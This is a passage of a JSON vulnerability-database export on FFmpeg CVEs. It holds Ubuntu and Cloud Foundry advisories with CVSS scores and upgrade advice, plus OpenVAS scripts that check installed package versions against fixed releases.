An attacker could possibly use this issue to \nobtain sensitive information or other unspecified impact. This issue \nonly affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-17542)\n\nIt was discovered that FFmpeg incorrectly handled certain JPEG files. An \nattacker could possibly use this issue to obtain sensitive information \nor other unspecified impact. This issue only affected Ubuntu 20.04 LTS. \n(CVE-2020-12284)\n\nIt was discovered that FFmpeg incorrectly handled certain M3U8 files. An \nattacker could possibly use this issue to obtain sensitive information \nor other unspecified impact. (CVE-2020-13904)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-22T00:00:00", "type": "ubuntu", "title": "FFmpeg vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15822", "CVE-2019-13312", "CVE-2019-11338", "CVE-2020-12284", "CVE-2019-12730", "CVE-2019-17542", "CVE-2019-13390", "CVE-2019-17539", "CVE-2020-13904"], "modified": "2020-07-22T00:00:00", "id": "USN-4431-1", "href": "https://ubuntu.com/security/notices/USN-4431-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2021-08-11T17:39:10", "description": "# \n\n## Severity\n\nMedium\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 18.04\n\n## Description\n\nIt was discovered that FFmpeg incorrectly verified empty audio packets or HEVC data. An attacker could possibly use this issue to cause a denial of service via a crafted file. This issue only affected Ubuntu 16.04 LTS, as it was already fixed in Ubuntu 18.04 LTS. For more information see: https://usn.ubuntu.com/usn/usn-3967-1 (CVE-2018-15822, CVE-2019-11338)\n\nIt was discovered that FFmpeg incorrectly handled sscanf failures. An attacker could possibly use this issue to cause a denial of service or other unspecified impact. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-12730)\n\nIt was discovered that FFmpeg incorrectly handled certain WEBM files. An attacker could possibly use this issue to obtain sensitive data or other unspecified impact. This issue only affected Ubuntu 20.04 LTS. (CVE-2019-13312)\n\nIt was discovered that FFmpeg incorrectly handled certain AVI files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-13390)\n\nIt was discovered that FFmpeg incorrectly handled certain input. An attacker could possibly use this issue to cause a denial of service or other unspecified impact. This issue only affected Ubuntu 18.04 LTS. (CVE-2019-17539)\n\nIt was discovered that FFmpeg incorrectly handled certain input during decoding of VQA files. An attacker could possibly use this issue to obtain sensitive information or other unspecified impact. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-17542)\n\nIt was discovered that FFmpeg incorrectly handled certain JPEG files. An attacker could possibly use this issue to obtain sensitive information or other unspecified impact. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-12284)\n\nIt was discovered that FFmpeg incorrectly handled certain M3U8 files. An attacker could possibly use this issue to obtain sensitive information or other unspecified impact. (CVE-2020-13904)\n\nCVEs contained in this USN include: CVE-2018-15822, CVE-2019-11338, CVE-2019-12730, CVE-2019-13312, CVE-2019-13390, CVE-2019-17539, CVE-2019-17542, CVE-2020-12284, CVE-2020-13904.\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * cflinuxfs3 \n * All versions prior to 0.200.0\n * CF Deployment \n * All versions prior to v13.9.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * cflinuxfs3 \n * Upgrade All versions to 0.200.0 or greater\n * CF Deployment \n * Upgrade All versions to v13.9.0 or greater\n\n## References\n\n * [USN Notice](<https://usn.ubuntu.com/4431-1/>)\n * [CVE-2018-15822](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-15822>)\n * [CVE-2019-11338](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-11338>)\n * [CVE-2019-12730](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-12730>)\n * [CVE-2019-13312](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13312>)\n * [CVE-2019-13390](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-13390>)\n * [CVE-2019-17539](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-17539>)\n * [CVE-2019-17542](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-17542>)\n * [CVE-2020-12284](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-12284>)\n * [CVE-2020-13904](<https://people.canonical.com/~ubuntu-security/cve/CVE-2020-13904>)\n\n## History\n\n2020-08-27: Initial vulnerability report published.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-27T00:00:00", "type": "cloudfoundry", "title": "USN-4431-1: FFmpeg vulnerabilities | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15822", "CVE-2019-11338", "CVE-2019-12730", "CVE-2019-13312", "CVE-2019-13390", "CVE-2019-17539", "CVE-2019-17542", "CVE-2020-12284", "CVE-2020-13904"], "modified": "2020-08-27T00:00:00", "id": "CFOUNDRY:B9A9CA5BDFFD3E38770D50823BFCD6E5", "href": "https://www.cloudfoundry.org/blog/usn-4431-1/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-09T14:28:47", "description": "FFmpeg is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-07-15T00:00:00", "type": "openvas", "title": "FFmpeg <= 4.1.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13390", "CVE-2019-13312"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113425", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113425\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-15 10:08:18 +0000 (Mon, 15 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-13312\", \"CVE-2019-13390\");\n script_bugtraq_id(109090);\n\n script_name(\"FFmpeg <= 4.1.3 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ffmpeg_detect_lin.nasl\");\n script_mandatory_keys(\"FFmpeg/Linux/Ver\");\n\n script_tag(name:\"summary\", value:\"FFmpeg is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - block_cmp() in libavcodec/zmbvenc.c has a heap-based buffer over-read.\n\n - There is a division by zero at adx_write_trailer in libavformat/rawenc.c.\n This may be related to two NULL pointers passed as arguments\n at libavcodec/frame_thread_encoder.c.\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to crash the application,\n read sensitive information or execute arbitrary code on the target machine.\");\n script_tag(name:\"affected\", value:\"FFmpeg versions 4.0.0 through 4.1.3.\");\n script_tag(name:\"solution\", value:\"Update to version 4.1.4.\");\n\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7980\");\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7979\");\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7981\");\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7982\");\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7983\");\n script_xref(name:\"URL\", value:\"https://trac.ffmpeg.org/ticket/7985\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:ffmpeg:ffmpeg\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, exit_no_version: TRUE ) ) exit( 0 );\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_in_range( version: version, test_version: \"4.0.0\", test_version2: \"4.1.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"4.1.4\", install_path: location );\n security_message( data: report, port: 0 );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:05:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-07-10T00:00:00", "type": "openvas", "title": "Debian: Security Advisory for ffmpeg (DSA-4722-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13390", "CVE-2020-13904", "CVE-2019-17542", "CVE-2020-12284", "CVE-2019-17539"], "modified": "2020-07-10T00:00:00", "id": "OPENVAS:1361412562310704722", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704722", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704722\");\n script_version(\"2020-07-10T03:00:09+0000\");\n script_cve_id(\"CVE-2019-13390\", \"CVE-2019-17539\", \"CVE-2019-17542\", \"CVE-2020-12284\", \"CVE-2020-13904\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-10 03:00:09 +0000 (Fri, 10 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-10 03:00:09 +0000 (Fri, 10 Jul 2020)\");\n script_name(\"Debian: Security Advisory for ffmpeg (DSA-4722-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4722.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4722-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ffmpeg'\n package(s) announced via the DSA-4722-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\");\n\n script_tag(name:\"affected\", value:\"'ffmpeg' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 7:4.1.6-1~deb10u1.\n\nWe recommend that you upgrade your ffmpeg packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg-doc\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra58\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec58\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice58\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra7\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter7\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat58\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample4\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil56\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc55\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample3\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale5\", ver:\"7:4.1.6-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-21T14:56:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4502-1 (ffmpeg - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12730"], "modified": "2019-08-20T00:00:00", "id": "OPENVAS:1361412562310704502", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704502", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704502\");\n script_version(\"2019-08-20T12:58:09+0000\");\n script_cve_id(\"CVE-2019-12730\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-20 12:58:09 +0000 (Tue, 20 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-17 02:00:17 +0000 (Sat, 17 Aug 2019)\");\n script_name(\"Debian Security Advisory DSA 4502-1 (ffmpeg - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4502.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4502-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ffmpeg'\n package(s) announced via the DSA-4502-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\");\n\n script_tag(name:\"affected\", value:\"'ffmpeg' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), this problem has been fixed in\nversion 7:4.1.4-1~deb10u1.\n\nWe recommend that you upgrade your ffmpeg packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ffmpeg-doc\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec-extra58\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavcodec58\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavdevice58\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter-extra7\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavfilter7\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavformat58\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavresample4\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libavutil56\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpostproc55\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswresample3\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale-dev\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libswscale5\", ver:\"7:4.1.4-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T12:42:10", "description": "FFmpeg does not check for sscanf failure and consequently allows use of uninitialized variables.", "cvss3": {}, "published": "2019-06-19T00:00:00", "type": "openvas", "title": "FFmpeg < 3.2.14 Use Of Uninitialized Variables", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12730"], "modified": "2019-06-19T00:00:00", "id": "OPENVAS:1361412562310113411", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113411", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113411\");\n script_version(\"2019-06-19T10:50:22+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-19 10:50:22 +0000 (Wed, 19 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-19 12:35:34 +0000 (Wed, 19 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-12730\");\n\n script_name(\"FFmpeg < 3.2.14 Use Of Uninitialized Variables\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ffmpeg_detect_lin.nasl\");\n script_mandatory_keys(\"FFmpeg/Linux/Ver\");\n\n script_tag(name:\"summary\", value:\"FFmpeg does not check for sscanf failure and consequently allows use of uninitialized variables.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"impact\", value:\"Successful exploitation may allow an attacker to execute arbitrary code on the target machine.\");\n script_tag(name:\"affected\", value:\"FFmpeg through version 3.2.13.\");\n script_tag(name:\"solution\", value:\"Update to version 3.2.14.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/FFmpeg/FFmpeg/commit/ed188f6dcdf0935c939ed813cf8745d50742014b\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:ffmpeg:ffmpeg\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, exit_no_version: TRUE ) ) exit( 0 );\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"3.2.14\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.14\", install_path: location );\n security_message( data: report, port: 0 );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:44", "description": "Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.", "cvss3": {}, "published": "2018-07-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4249-1 (ffmpeg - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-13300", "CVE-2018-6621", 